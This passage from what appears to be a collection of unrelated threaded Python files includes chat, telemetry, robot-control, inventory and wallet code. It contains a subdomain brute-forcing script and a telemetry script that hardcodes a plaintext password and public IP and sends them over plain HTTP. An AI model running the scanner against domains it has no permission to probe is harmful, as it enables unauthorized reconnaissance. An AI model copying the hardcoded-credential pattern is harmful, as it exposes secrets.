x.bind((h_name, port))
print( "server done binding to host and port successfully")
print("server is waiting for incoming connections")
x.listen()
connection,address= x.accept()
print(address, " Has connected to the server and is now online...")
print("You can now start sending messages")
def send():
while 1:
display_mess= input(str())
display_mess=display_mess.encode()
connection.send(display_mess)
def recv():
while 1:
in_message=connection.recv(1024)
in_message = in_message.decode()
print("Client:", in_message)
threading.Thread(target=send).start()
threading.Thread(target=recv).start()
|
main2.py
|
import serial
import requests
import json
import time
import threading
def worker(end_point, data):
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
try:
r = requests.post('http://78.160.156.154:8000/api/{}/'.format(end_point), data=json.dumps(data), headers=headers)
except:
print("Data didnt send!")
bms = serial.Serial('/dev/tty.usbmodem1451',9600)
while 1:
print(' ')
row_data = bms.readline()
clear_data = row_data.decode("utf-8")
try:
opcode = clear_data[:1]
print(opcode)
except:
continue
if opcode == 'i':
if clear_data == None:
continue
try:
isi = clear_data[2:]
temperature_data = {"username": "car", "password": "yusufmerhaba", "engine_temperature":isi}
temperature_thread = threading.Thread(target=worker, args=("temperature", temperature_data))
temperature_thread.start()
except:
continue
print('Temperature: {}'.format(isi))
if opcode == 'h':
try:
print(clear_data[1:])
hiz = float(clear_data[1:])
velocity_data = {"username": "car", "password": "yusufmerhaba", "velocity": hiz}
velocity_thread = threading.Thread(target=worker, args=("velocity", velocity_data))
velocity_thread.start()
except:
continue
print('speed: {}'.format(hiz))
time.sleep(0.2)
|
subdomainfinder.py
|
import requests
import threading
domain = input("Enter domain: ")
with open('wordlist.txt', 'r') as file:
    subdomains = file.read().splitlines()
def check(subdomain):
    # probe both the http and https variants of the candidate subdomain
    url1 = f"http://{subdomain}.{domain}"
    url2 = f"https://{subdomain}.{domain}"
    try:
        requests.get(url1)
        print(f"Discovered URL: {url1}")
        requests.get(url2)
        print(f"Discovered URL: {url2}")
    except requests.ConnectionError:
        pass
# spawn one worker thread per candidate subdomain
for subdomain in subdomains:
    thread = threading.Thread(target=check, args=(subdomain,))
    thread.start()
|
__main__.py
|
import sys
import argparse
import ipaddress
import threading
from queue import Queue
import socket
import paramiko
from pynventory.hosts import LinuxHost
parser = argparse.ArgumentParser(description='Create a DokuWiki friendly inventory table or system hostfile of your '
'servers',
usage='pynventory 192.168.1.0/24 --hostname --cpu_cores --memory')
parser.add_argument('ip_range', action='store', help='CIDR IP range. ie: 192.168.0.0/24')
parser.add_argument('--format',
action='store',
help='Choose the output format. Option "hostfile" ignores all additional checks but forces '
'--hostname',
choices=['dokuwiki', 'hostfile'],
default='dokuwiki')
parser.add_argument('--cpu_cores', action='append_const', const=LinuxHost.GetCpuCores, dest='host_checks')
parser.add_argument('--hostname', action='append_const', const=LinuxHost.GetHostname, dest='host_checks')
parser.add_argument('--os_version', action='append_const', const=LinuxHost.GetOsRelease, dest='host_checks')
parser.add_argument('--ntp_host', action='append_const', const=LinuxHost.GetNtpServer, dest='host_checks')
parser.add_argument('--memory', action='append_const', const=LinuxHost.GetMemory, dest='host_checks')
parser.add_argument('--disk', action='append_const', const=LinuxHost.GetDiskSize, dest='host_checks')
parser.add_argument('--kernel', action='append_const', const=LinuxHost.GetKernelVersion, dest='host_checks')
parser.add_argument('--link_host',
action='store',
dest='link_host',
default=False,
help='create link to a new page for host description with this as base url')
parser.add_argument('--link_empty_host',
action='store_true',
default=False,
help='create links for nonexistent hosts')
parser.add_argument('--user', action='store', dest='ssh_user', help='ssh user', default='root')
parser.add_argument('--report_errors',
action='store_true',
dest='report_errors',
help='Report connection failures (except for timeout) to stdout')
parser.add_argument('-d', action='store_true', dest='debug', help='enable verbose output to stderr')
args = parser.parse_args()
# Defining globals
# Creating queue
compress_queue = Queue()
# Main result list.
result = []
def check_host(host):
if not args.debug:
print('.', end='', file=sys.stderr, flush=True)
if args.format == "hostfile":
args.host_checks = [LinuxHost.GetHostname, ]
try:
i = LinuxHost(host, args.ssh_user)
host_result = [i, ]
for check in args.host_checks:
host_result.append(check(i))
if args.debug:
print('Host: %s Ok' % host, file=sys.stderr)
except paramiko.ssh_exception.NoValidConnectionsError as e:
# NoValidConnectionsError wraps all socket-related exceptions (socket.error)
empty_list = ['' for _ in range(len(args.host_checks))]
if args.report_errors:
empty_list[0] = 'Error: ' + ' '.join(str(e).split()[2:8])
host_result = [host, ] + empty_list
except socket.timeout as e:
# Don't report socket timeouts
empty_list = ['' for _ in range(len(args.host_checks))]
host_result = [host, ] + empty_list
if args.debug:
print('Host: %s Error: %s' % (host, e), file=sys.stderr)
except (paramiko.ssh_exception.AuthenticationException, Exception) as e:
# Catch all paramiko Auth exceptions
empty_list = ['' for _ in range(len(args.host_checks))]
if args.report_errors:
empty_list[0] = 'Error: ' + str(e)
host_result = [host, ] + empty_list
finally:
result.append(host_result)
return
def process_queue():
while True:
host_data = compress_queue.get()
check_host(host_data)
compress_queue.task_done()
def format_dokuwiki(host_result):
header_title = ['Host', ] + [check.display_name() for check in args.host_checks]
# Convert all the cells into strings
cells = [[str(cell) for cell in row] for row in [header_title, ] + host_result]
# create link to hosts if arg is set
if args.link_host:
for row in cells[1:]:
# Only create a link if the host exists or the flag is set
if row[1] or args.link_empty_host:
row[0] = f'[[{args.link_host}:{row[0]}|{row[0]}]]'
# Get the longest entry for every column
column_length = [max(map(len, col)) for col in zip(*cells)]
# Create spacing for cells
format_header = '^ {} ^'.format(' ^ '.join('{{:{}}}'.format(length) for length in column_length))
format_body = '| {} |'.format(' | '.join('{{:{}}}'.format(length) for length in column_length))
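# e.g. for column widths [12, 8] this builds '^ {:12} ^ {:8} ^' for the header
# row and '| {:12} | {:8} |' for body rows (DokuWiki table markup).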
# Print output...
print(format_header.format(*header_title))
for row in cells[1:]:
print(format_body.format(*row))
def format_hostfile(host_result):
for host in host_result:
if host[1]:
print(host[0], host[1])
def main():
# Exit if no checks are given
if not args.host_checks and args.format == "dokuwiki":
parser.print_help()
exit(1)
# Starting threads
threads = 10
for _ in range(threads):
t = threading.Thread(target=process_queue)
t.daemon = True
t.start()
try:
# Providing threads with work
ip_range = ipaddress.ip_network(args.ip_range)
except ValueError as e:
print(f"Failed to parse the provided network with error: {e}")
exit(1)
# Ignore Network and Broadcast addresses
skip_addresses = [ip_range.network_address, ip_range.broadcast_address]
for host in ip_range:
if host in skip_addresses:
continue
compress_queue.put(str(host))
# Wait for queue to finish
compress_queue.join()
# Force a clean line break before output
print(file=sys.stderr)
# Results from queues are not sorted.
host_result = sorted(result[1:], key=lambda a: int(str(a[0]).split('.')[3]))
if args.format == "dokuwiki":
format_dokuwiki(host_result)
if args.format == "hostfile":
format_hostfile(host_result)
if __name__ == '__main__':
main()
|
com.py
|
from ctypes import byref, oledll, windll
from ctypes.wintypes import DWORD, HANDLE
import logging
import threading
from comtypes import CoInitializeEx, CoUninitialize
from comtypes.client import CreateObject, GetEvents
import psutil
__all__ = (
'ITUNES_PLAYER', 'ITUNES_PLAYER_STATE_STOPPED', 'ITUNES_PLAYER_STATE_PLAYING',
'is_itunes_running', 'ITunesObserver', 'PlayersObserver',
)
################################################################################################################################################################
CloseHandle = windll.kernel32.CloseHandle
CoWaitForMultipleHandles = oledll.ole32.CoWaitForMultipleHandles
CreateEventW = windll.kernel32.CreateEventW
FindWindowW = windll.user32.FindWindowW
ResetEvent = windll.kernel32.ResetEvent
logger = logging.getLogger(__name__)
################################################################################################################################################################
ITUNES_PLAYER = 'iTunes'
ITUNES_PLAYER_STATE_STOPPED = 0
ITUNES_PLAYER_STATE_PLAYING = 1
################################################################################################################################################################
def is_itunes_running():
# Unfortunately, iTunes doesn't register itself against the ROT, so we must resort to cruder evidence…
return (
FindWindowW('iTunesApp', 'iTunes') and
FindWindowW('iTunes', 'iTunes') and
any((p.name() == 'iTunes.exe') for p in psutil.process_iter())
)
class ITunesObserver:
__slots__ = ('_npn', '_parent', '_app', '_connection')
def __init__(self, npn, parent):
self._npn = npn
self._parent = parent
self._app = CreateObject('iTunes.Application')
logger.info('Subscribing to «iTunes» events…')
self._connection = GetEvents(self._app, self)
def _IiTunesEvents_OnPlayerPlayEvent(self, track):
self.update(track)
def _IiTunesEvents_OnPlayerStopEvent(self, track):
self.update(track)
def _IiTunesEvents_OnPlayerPlayingTrackChangedEvent(self, track):
self.update(track)
def _IiTunesEvents_OnQuittingEvent(self):
self._parent.unregister(self)
def _IiTunesEvents_OnAboutToPromptUserToQuitEvent(self):
self._parent.unregister(self)
def update(self, track):
if self._app.PlayerState == ITUNES_PLAYER_STATE_PLAYING:
(artist, title) = (track.Artist, track.Name)
logger.info('«iTunes» notified us that it is now playing «{0:s}» by «{1:s}»…'.format(title, artist))
self._npn.notify(ITUNES_PLAYER, (artist, title))
elif self._app.PlayerState == ITUNES_PLAYER_STATE_STOPPED:
logger.info('«iTunes» notified us that it is no longer playing anything…')
self._npn.notify(ITUNES_PLAYER, None)
def close(self):
logger.info('Unsubscribing from «iTunes» events…')
del self._connection
del self._app
self._npn.notify(ITUNES_PLAYER, None)
class PlayersObserver:
__slots__ = ('_players', '_terminating', '_thread')
def __init__(self, npn):
self._players = {}
self._terminating = threading.Event()
def event_loop():
CoInitializeEx()
hevt_dummy = CreateEventW(None, True, False, 'Dummy')
p_handles = (HANDLE * 1)(hevt_dummy)
lpdw_index = byref(DWORD())
try:
while not self._terminating.is_set():
if ITunesObserver not in self._players:
if is_itunes_running():
self._players[ITunesObserver] = ITunesObserver(npn, self)
elif self._players[ITunesObserver] is None:
del self._players[ITunesObserver]
ResetEvent(hevt_dummy) # … in case some joker decides to set it…
try:
CoWaitForMultipleHandles(0, 2000, len(p_handles), p_handles, lpdw_index)
except OSError as err:
if err.winerror != -2147417835: # RPC_S_CALLPENDING
raise
finally:
CloseHandle(hevt_dummy)
for player in self._players.values():
player.close()
CoUninitialize()
self._thread = threading.Thread(target=event_loop, name='COMPlayersObserverThread')
self._thread.start()
def close(self):
self._terminating.set()
self._thread.join()
def unregister(self, player):
assert threading.current_thread() is self._thread
Player = type(player)
assert Player in self._players
assert self._players[Player] is player
player.close()
self._players[Player] = None # This contrivance introduces a delay such that we're less likely to re-register a closing player.
|
Hiwin_socket_ros_20190521121514.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and transmit them to the control-side computer via socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import Hiwin_socket_TCPcmd as TCP
import Hiwin_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response count
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator is a RuntimeError in Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
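# Usage sketch of the switch/case idiom above (illustrative only):
#
#   for case in switch(value):
#       if case(1):
#           handle_one()
#           break
#       if case(2, 3):
#           handle_two_or_three()
#           break
#       if case():          # no arguments -> default branch, always matches
#           handle_default()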
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.0.1', 8080))#iclab 5
s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input = int(input('Press 1 to start transmission, 3 to exit: '))
#start_input = 1
if start_input==1:
while 1:
##--------------- send arm commands over the socket -----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
s.send(data.encode('utf-8')) # encode the command string before sending it over the socket
feedback_str = s.recv(1024)
# the arm side reports the arm state
###test 0403
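# feedback_str[2] is a single byte of the reply; 70, 84 and 54 are the ASCII
# codes for 'F' (arm free), 'T' (arm busy) and '6' (shutdown request).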
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
feedback = 0
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##--------------- send arm commands over the socket end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent/outdent line
|
RTTclient.py
|
import socket
import time
import random
import numpy as np
import serial
import random
import logging
import multiprocessing as mp
from queue import Queue
import traceback
import re
import csv
class WarpConnectorClass(object):
#TODO: Need to implement exception handling at each socket use
dataBuffer = [0,0,0,0,0,0]
exitProgMode = False
lastSend = ''
tempStringBuffer = ""
recvdData = ""
sampleLimit = 10
readCount = 0
autoReadEnabled = True
endTag = "Enter selection>"
progRead = False
warpConnected = False
logger = mp.get_logger()
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 19021 # Port to listen on (non-privileged ports are > 1023)
def __init__(self): #thread initialisation
self.warpSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connectionType = "serial"
self._running = True
def terminate(self):
self.logger.debug("Termination Handle called")
self._running = False
def run(self,warpAtMenu,dataQueue, dataReady, uInputQueue):
while not self.warpConnected:
try :
warpConnectionHandle = self.warpSocket.connect((self.HOST, self.PORT))
self.warpConnected = True
except Exception as e:
self.warpConnected = False
self.logger.error(e)
self.logger.debug(traceback.format_exc())
time.sleep(2)
uInput = ""
while self._running:
self.logger.debug("# - waiting for data")
data = self.warpSocket.recv(1024)
if not data:
break
# conn.sendall(data)
else :
# dataReady.set()
# print(data[len(data)- len(self.endTag):])
print("# (", len(data.decode('ascii')), ") : ", data.decode('ascii'))
# self.logger.error("# - %s", data.decode('ascii'))
# print("test = ", data.decode('ascii')[1:8])
if (re.search(r'progExit',data.decode('ascii')) != None):
self.logger.debug("progExit match!")
self.exitProgMode = False
# if (data[len(data)- len(self.endTag):].decode('ascii') == self.endTag):
rePattern = r'.*' + re.escape(self.endTag) + r'.*'
if (re.search(rePattern,data.decode('ascii')) != None):
self.logger.debug("End matched! -> Menu load completed!")
warpAtMenu.set()
# self.exitProgMode = False
if(warpAtMenu.is_set()):
# self.exitProgMode = False
self.logger.debug("Waiting for user input")
uInput = uInputQueue.get()
self.logger.debug("User input = %s", uInput)
if uInput == "#":
warpAtMenu.clear()
self.autoReadEnabled = True
self.logger.debug("Entering Programatic read mode!")
self.warpSocket.send('#9'.encode('ascii'))
self.lastSend = '#9'
self.progRead = True
else:
warpAtMenu.clear()
self.warpSocket.send(uInput.encode('ascii'))
self.lastSend = uInput
if (self.progRead and (self.readCount < self.sampleLimit)):
reAS7262 = re.search(r'AS7262:', data.decode('ascii'))
if (reAS7262 != None):
# if (data == b'\r\nAS7262:'):
# _ = self.warpSocket.recv(1)
# dataBuffer = []
self.dataBuffer = [0,0,0,0,0,0]
# print("Data Read Begin")
self.recvdData = self.warpSocket.recv(1)
while self.recvdData.decode('ascii') != '\n':
self.tempStringBuffer += self.recvdData.decode('ascii')
self.recvdData = self.warpSocket.recv(1)
self.logger.debug("data = %s size = %d", self.tempStringBuffer, len(self.tempStringBuffer))
if len(self.tempStringBuffer) == 35:
tempDataList = self.tempStringBuffer.split(',')
for x in range(0,12,2):
try:
self.dataBuffer[int(x/2)] = int(tempDataList[x]+tempDataList[x+1],16)
dataReady.set()
except Exception as e:
self.logger.error("Error - %s", e)
self.warpSocket.send('~'.encode('ascii'))
self.lastSend = '~'
self.tempStringBuffer = ""
if dataReady.is_set():
self.readCount += 1
self.logger.info("AS7262 Sample : %d - sending data = %s", self.readCount, self.dataBuffer)
try:
dataQueue.put(self.dataBuffer)
# writeData(self.dataBuffer) ######
except Exception as e:
self.logger.error("Error - %s", e)
dataReady.clear()
if (self.readCount >= self.sampleLimit):
self.logger.debug("Read limit reached")
self.exitProgMode = True
self.autoReadEnabled = False
self.progRead = False
warpAtMenu.clear()
self.readCount = 0
if self.exitProgMode and not warpAtMenu.is_set() and self.lastSend != '&':
self.logger.debug("Exiting programatic read mode")
self.lastSend = '&'
self.warpSocket.send('&'.encode('ascii'))
self.warpConnected = False
self.warpSocket.shutdown(socket.SHUT_RDWR)
self.warpSocket.close()
class DataCollectorClass(object):
logToFIle = True
dataFilePrefix = "temp"
def __init__(self): #thread initialisation
self._running = True
self.dataFileName = self.dataFilePrefix + str(time.time()) + '.csv'
def terminate(self):
self._running = False
def run(self, dataQueue, dataReady, logDataToFile, logDataToUI):
# uiCon = serial.Serial('COM7', 19200)
logger = mp.get_logger()
while self._running:
try:
d = dataQueue.get()
if logDataToFile:
with open(self.dataFileName, 'a', newline='') as dataFile:
spamWrite = csv.writer(dataFile, quotechar='|', quoting=csv.QUOTE_MINIMAL)
spamWrite.writerow([time.time()] + d)
if logDataToUI:
pass
except Exception as e:
logger.error("Error - %s", e)
def writeData(self, dataList):
self.uiCon.write("#".encode('ascii')) # 0
# Time
self.uiCon.write(str(time.ctime() + ',').encode('ascii'))
# Ultrasonic data
self.uiCon.write((str(dataList[0]) + ",").encode('ascii')) # V
self.uiCon.write((str(dataList[1]) + ",").encode('ascii')) # b
self.uiCon.write((str(dataList[2]) + ",").encode('ascii')) # g
self.uiCon.write((str(dataList[3]) + ",").encode('ascii')) # y
self.uiCon.write((str(dataList[4]) + ",").encode('ascii')) # o
self.uiCon.write(str(dataList[5]).encode('ascii')) # r
self.uiCon.write("\n".encode('ascii'))
#WIP FAO-JASON
class sensorCharacterisationClass(DataCollectorClass):
dataFileName = "data.csv"
def run(self, dataQueue, dataReady):
logger = mp.get_logger()
while self._running:
try:
d = dataQueue.get()
logger.warn("Data Recieved = %s", d)
with open(self.dataFileName, 'a') as dataFile:
spamWrite = csv.writer(dataFile) #, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL)
spamWrite.writerow(d)
except Exception as e:
logger.error("Error - %s", e)
if __name__ == "__main__":
# warpAtMenu = False
# self.progRead = False
terminateFlag = False
logDataToFile = True
logDataToUI = False
mpManager = mp.Manager()
mpLock = mp.Lock()
processList = []
mp.log_to_stderr()
logger = mp.get_logger()
logger.setLevel(logging.INFO)
warpAtMenu = mp.Event()
warpDataReady = mp.Event()
warpAtMenu.clear()
# userInput = mp.sharedctypes.Array('c',b'',lock=mpLock)
dataQueueToUI = mp.Queue()
uInputQueue = mp.Queue()
warpConnectorInstance = WarpConnectorClass()
dataCollectorInstance = DataCollectorClass()
warpConnectorProcess = mp.Process(target = warpConnectorInstance.run, args=(warpAtMenu,dataQueueToUI, warpDataReady, uInputQueue),name="Warp")
dataCollectorProcess = mp.Process(target = dataCollectorInstance.run, args=(dataQueueToUI, warpDataReady, logDataToFile, logDataToUI),name="UI")
dataCollectorProcess.start()
processList.append(dataCollectorProcess)
warpConnectorProcess.start()
processList.append(warpConnectorProcess)
while not terminateFlag:
uInput = input()
if uInput == "&":
terminateFlag = True
elif (uInput != " ") and (uInput != "\n") and (uInput != "\r") and (uInput != "\r\n") and (uInput != ""):
uInputQueue.put(uInput)
else:
print("Invalid input")
# time.sleep(15)
for p in processList:
p.terminate()
for p in processList:
p.join()
|
test_fork1.py
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import time
import unittest
from test.fork_wait import ForkWait
from test.support import (reap_children, get_attribute,
import_module, verbose)
threading = import_module('threading')
# Skip test if fork does not exist.
get_attribute(os, 'fork')
class ForkTest(ForkWait):
def wait_impl(self, cpid):
deadline = time.monotonic() + 10.0
while time.monotonic() <= deadline:
# waitpid() shouldn't hang, but some of the buildbots seem to hang
# in the forking tests. This is an attempt to fix the problem.
spid, status = os.waitpid(cpid, os.WNOHANG)
if spid == cpid:
break
time.sleep(0.1)
self.assertEqual(spid, cpid)
self.assertEqual(status, 0, "cause = %d, exit = %d" % (status&0xff, status>>8))
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(0)
else:
if verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(0)
self.wait_impl(pid)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
def tearDownModule():
reap_children()
if __name__ == "__main__":
unittest.main()
|
installwizard.py
|
import sys
import threading
import traceback
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import electrum_dash
from electrum_dash.i18n import _
from seed_dialog import SeedDisplayLayout, SeedWarningLayout, SeedInputLayout
from network_dialog import NetworkChoiceLayout
from util import *
from password_dialog import PasswordLayout, PW_NEW, PW_PASSPHRASE
from electrum_dash.wallet import Wallet
from electrum_dash.mnemonic import prepare_seed
from electrum_dash.util import UserCancelled
from electrum_dash.wizard import (WizardBase,
MSG_ENTER_PASSWORD, MSG_RESTORE_PASSPHRASE,
MSG_COSIGNER, MSG_ENTER_SEED_OR_MPK,
MSG_SHOW_MPK, MSG_VERIFY_SEED,
MSG_GENERATING_WAIT)
def clean_text(seed_e):
text = unicode(seed_e.toPlainText()).strip()
text = ' '.join(text.split())
return text
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
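# QPainter.drawPie expects angles in 1/16th-of-a-degree units, so each of the
# n slices spans 16*360/n; the first m slices are drawn green to show how many
# cosigner signatures are required.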
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, WizardBase):
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-DASH - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(530, 370)
self.setMaximumSize(530, 370)
self.connect(self, QtCore.SIGNAL('accept'), self.accept)
self.title = WWLabel()
self.main_widget = QWidget()
self.cancel_button = QPushButton(_("Cancel"), self)
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(False))
self.cancel_button.clicked.connect(lambda: self.loop.exit(False))
self.next_button.clicked.connect(lambda: self.loop.exit(True))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addLayout(inner_vbox)
hbox.setStretchFactor(inner_vbox, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.cancel_button, self.next_button))
self.set_icon(':icons/electrum-dash.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def finished(self):
'''Ensure the dialog is closed.'''
self.accept()
self.refresh_gui()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_main_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.title.setText(title or "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
